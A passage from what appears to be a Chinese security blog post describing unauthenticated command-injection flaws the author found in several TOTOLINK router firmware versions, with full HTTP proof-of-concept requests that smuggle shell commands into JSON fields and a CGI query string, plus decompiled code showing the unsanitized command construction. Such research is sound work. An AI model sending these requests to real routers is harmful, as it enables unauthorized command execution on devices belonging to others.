<h3 id="案例三-：X5000R-V9-1-0cu-2350-B20230313-未授权命令注入执行"><a href="#案例三-：X5000R-V9-1-0cu-2350-B20230313-未授权命令注入执行" class="headerlink" title="案例三 ：X5000R V9.1.0cu.2350_B20230313 未授权命令注入执行"></a>案例三 ：X5000R V9.1.0cu.2350_B20230313 未授权命令注入执行</h3><h5 id="产品信息"><a href="#产品信息" class="headerlink" title="产品信息"></a>产品信息</h5><p>设备：TOTOlink X5000R<br>固件版本：V9.1.0cu.2350_B20230313<br>制造商网站信息：<a target="_blank" rel="noopener" href="https://www.totolink.net/">https://www.totolink.net/</a><br>固件下载地址：<a target="_blank" rel="noopener" href="https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html">https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html</a></p>
<h5 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h5><p>cstecgi.cgi的setLanguageCfg接口存在未授权任意命令执行</p>
<h5 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h5><p>直接上操作了，这里启动httpd命令如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lighttpd -f etc/lighttpd/lighttpd.conf</span><br></pre></td></tr></table></figure>

<p>直接未授权进行命令注入</p>
<p><img src="/img/6.png" alt="6"></p>
<p>POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/cstecgi.cgi HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Content-Length: 86</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">Origin: http://172.28.60.132</span><br><span class="line">Referer: http://172.28.60.132/login.html</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: SESSION_ID=2:1690339658:2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;&quot;lang&quot;:&quot;`ls&gt;/web/HRP.txt`&quot;,&quot;langAutoFlag&quot;:&quot;0&quot;,&quot;topicurl&quot;:&quot;setLanguageCfg&quot;,&quot;token&quot;:&quot;&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>结果</p>
<p><img src="/img/7.png" alt="7"></p>
<h5 id="思维发散"><a href="#思维发散" class="headerlink" title="思维发散"></a>思维发散</h5><p>这个洞是不是看起来非常简单，但是深究起来他其实整个框架都有大问题的，为什么这么说，待我慢慢分析。</p>
<p>我们可以看见他的行为是setLanguageCfg，进IDA先看看cstecgi.cgi，但是这个版本的CGI不是很好看，他对CFG的调用综合到了一个函数，但是这个函数丑死了逆向不动，这里这个案例三其实是由案例4的思维发散挖掘到的。案例是是在一个小配置点出了命令执行，然后我进行深挖发觉的，直接看同SO库，案例3和4都用到了libcscommon.so</p>
<p>这我直接说结果了，他是因为调用了Uci_Set_Str函数</p>
<p>我们先拿案例4的来给大家看下，案例是是集合到了shttpd里面。</p>
<p>在shttpd，先从sub_4103A8函数开始分析，此注入点在setTr069Cfg配置这</p>
<p>我们IDA反汇编shttpd找到这，可以看见了Uci_Set_Str的第四个参数基本上全可控。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">v33 = v26;</span><br><span class="line">  v34 = sub_40A4FC(a1, &quot;stun_user&quot;);</span><br><span class="line">  v35 = sub_40A4FC(v27, &quot;stun_pass&quot;);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, v28 - 25556, v32);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;server_address&quot;, v31);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;server_port&quot;, v30);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;max_keepalive&quot;, v29);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;min_keepalive&quot;, v33);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;username&quot;, v34);</span><br><span class="line">  Uci_Set_Str(42, &quot;stun&quot;, &quot;password&quot;, v35);</span><br><span class="line">  Uci_Commit(41);</span><br><span class="line">  Uci_Commit(42);</span><br><span class="line">  CsteSystem(&quot;/etc/init.d/stund restart&quot;, 0);</span><br><span class="line">  CsteSystem(&quot;/etc/init.d/cwmp restart&quot;, 0);</span><br><span class="line">  sub_40A548(a26, 1, &quot;&quot;, 0);</span><br><span class="line">  __asm &#123; jr      $ra &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个函数我们可以如下看so库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">❯ readelf -d squashfs-root/usr/sbin/shttpd</span><br><span class="line"></span><br><span class="line">Dynamic section at offset 0x188 contains 38 entries:</span><br><span class="line">  Tag        Type                         Name/Value</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libuci.so]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libjson-c.so.2]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libcjson.so]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libcscommon.so]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [liboperations.so]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libgcc_s.so.1]</span><br><span class="line"> 0x00000001 (NEEDED)                     Shared library: [libc.so]</span><br></pre></td></tr></table></figure>

<p>逐个分析后发现libcscommon.so处有引用，在/usr/lib目录下</p>
<p>IDA直接看，重点关注如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">snprintf(v9, 1024, &quot;uci -c %s set %s.%s.%s=\&quot;%s\&quot;&quot;, v8);</span><br><span class="line">   CsteSystem(v9, 0);</span><br><span class="line">   return 1;</span><br></pre></td></tr></table></figure>

<p>他是直接对我们传入的变量进行拼接执行，完全是没有过滤的，所以这就是思维发散，同个公司生成的产品，基本上这种共享SO库都是共用的，找到同模块大概率就是梭哈的了。</p>
<h4 id="案例四：TOTOlink-A3300R-V17-0-0cu-557-B20221024命令注入"><a href="#案例四：TOTOlink-A3300R-V17-0-0cu-557-B20221024命令注入" class="headerlink" title="案例四：TOTOlink A3300R V17.0.0cu.557_B20221024命令注入"></a>案例四：TOTOlink A3300R V17.0.0cu.557_B20221024命令注入</h4><h5 id="产品信息-1"><a href="#产品信息-1" class="headerlink" title="产品信息"></a>产品信息</h5><p>设备：TOTOlink A3300R<br>固件版本：V17.0.0cu.557_B20221024<br>制造商网站信息：<a target="_blank" rel="noopener" href="https://www.totolink.net/">https://www.totolink.net/</a><br>固件下载地址：<a target="_blank" rel="noopener" href="https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/241/ids/36.html">https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/241/ids/36.html</a></p>
<h5 id="漏洞描述-1"><a href="#漏洞描述-1" class="headerlink" title="漏洞描述"></a>漏洞描述</h5><p>shttpd的libcscommon.so库的Uci_Set_Str函数命令参数容易受到操作系统命令注入的影响。</p>
<p>具体接口如下URL</p>
<p>URL:<a target="_blank" rel="noopener" href="http://172.28.60.132/advance/tr069_cfg.html">http://172.28.60.132/advance/tr069_cfg.html</a></p>
<p>poc</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/cstecgi.cgi HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Content-Length: 273</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">Origin: http://172.28.60.132</span><br><span class="line">Referer: http://172.28.60.132/advance/tr069_cfg.html?time=1690220931665</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;&quot;addEffect&quot;:&quot;0&quot;,&quot;enable&quot;:&quot;1&quot;,&quot;url&quot;:&quot;127.0.0.1&quot;,&quot;user&quot;:&quot;1&quot;,&quot;pass&quot;:&quot;1&quot;,&quot;informEnable&quot;:&quot;0&quot;,&quot;interval&quot;:&quot;&quot;,&quot;stunEnable&quot;:&quot;0&quot;,&quot;stunServerAddr&quot;:&quot;&quot;,&quot;stunPort&quot;:&quot;&quot;,&quot;stunMaxAlive&quot;:&quot;3600&quot;,&quot;stunMinAlive&quot;:&quot;30&quot;,&quot;stun_user&quot;:&quot;admin&quot;,&quot;stun_pass&quot;:&quot;`ls&gt;/web/HRP.txt`&quot;,&quot;topicurl&quot;:&quot;setTr069Cfg&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>在totolink中setTr069Cfg这个也是常见的配置，上面分析我已经分析过了就不继续了。</p>
<p>为什么要说他就是因为他的启动方式和一般的不一样，他用的是shttpd，启动方式如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/sbin/shttpd -root /web</span><br></pre></td></tr></table></figure>

<h4 id="案例五：TOTOlink-A3100R-V4-1-2cu-5247-B20211129命令注入"><a href="#案例五：TOTOlink-A3100R-V4-1-2cu-5247-B20211129命令注入" class="headerlink" title="案例五：TOTOlink A3100R V4.1.2cu.5247_B20211129命令注入"></a>案例五：TOTOlink A3100R V4.1.2cu.5247_B20211129命令注入</h4><h5 id="产品信息-2"><a href="#产品信息-2" class="headerlink" title="产品信息"></a>产品信息</h5><p>设备：TOTOlink A3100R<br>固件版本：V4.1.2cu.5247_B20211129<br>制造商网站信息：<a target="_blank" rel="noopener" href="https://www.totolink.net/">https://www.totolink.net/</a><br>固件下载地址：<a target="_blank" rel="noopener" href="https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/170/ids/36.html">https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/170/ids/36.html</a></p>
<h5 id="漏洞描述-2"><a href="#漏洞描述-2" class="headerlink" title="漏洞描述"></a>漏洞描述</h5><p>downloadFlile.cgi存在未授权任意访问的命令执行</p>
<p>URL:<a target="_blank" rel="noopener" href="http://172.28.60.132/cgi-bin/downloadFlile.cgi">http://172.28.60.132/cgi-bin/downloadFlile.cgi</a></p>
<p>POC:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /cgi-bin/downloadFlile.cgi?l;ls$IFS&gt;/web_cste/HRP.txt; HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>注入命令”l;ls$IFS/&gt;/web_cste/HRP.txt”</p>
<h5 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h5><p>downloadFlile.cgi中获取GET参数的时候，没有任何过滤就进行了拼接后交付system执行导致了任意命令执行漏洞</p>
<p><img src="/img/8.png" alt="8"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这是我挖路由器的第二天，备战考研，忙里偷闲，弄完这两天就不弄了。上面的洞都是原创自挖的，其实从简单的路由器入门会好很多，有兴趣的还可以试试看水星和老版本的dlink tplink，但是论弱智程度，我得说还得是totolink。</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://hgreed.vip/2023/08/02/%E8%B7%AF%E7%94%B1%E5%99%A8%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B-by-HRP/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
    
      <a href="/2023/03/30/xctf-final%E7%AC%AC%E4%B8%83%E5%B1%8A-haslang/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">xctf-final第七届-haslang</div>
      </a>
    
  </nav>

  
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021-2023
        <i class="ri-heart-fill heart_icon"></i> H.greed
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="https://user-images.githubusercontent.com/72968793/136398013-abf88785-b056-4f51-aa15-a8ee261f5c7f.jpg" alt="H.greed"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://jue-xian.gitee.io/">老博客1</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://jue-xian.gitee.io/diazang">老博客2</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://www.mrskye.cn/">skye231</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://blackwatch219.github.io/">Blackwatch</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://zoeyctf.top">zoey</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://eeknight.top">eeknight</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://www.mrzry.top">mrzry</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://h3h3qaq.github.io/">H3h3QAQ</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://ctfking.com/">tajang</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://d0gekong.github.io/">驹宝宝</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://reigniting.github.io/">党姐</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://syunaht.com/">巡璃</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="https://www.xiinnn.com/">lxxx</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://www.baidu.com">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://www.baidu.com">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->
 <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
  var ayerConfig = {
    mathjax: true,
  };
</script>

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->
 
<script src="/js/clickLove.js"></script>
 
<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="86"
        src="//music.163.com/outchain/player?type=2&id=1878868202&auto=0&height=66"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
    

  </div>
</body>

</html>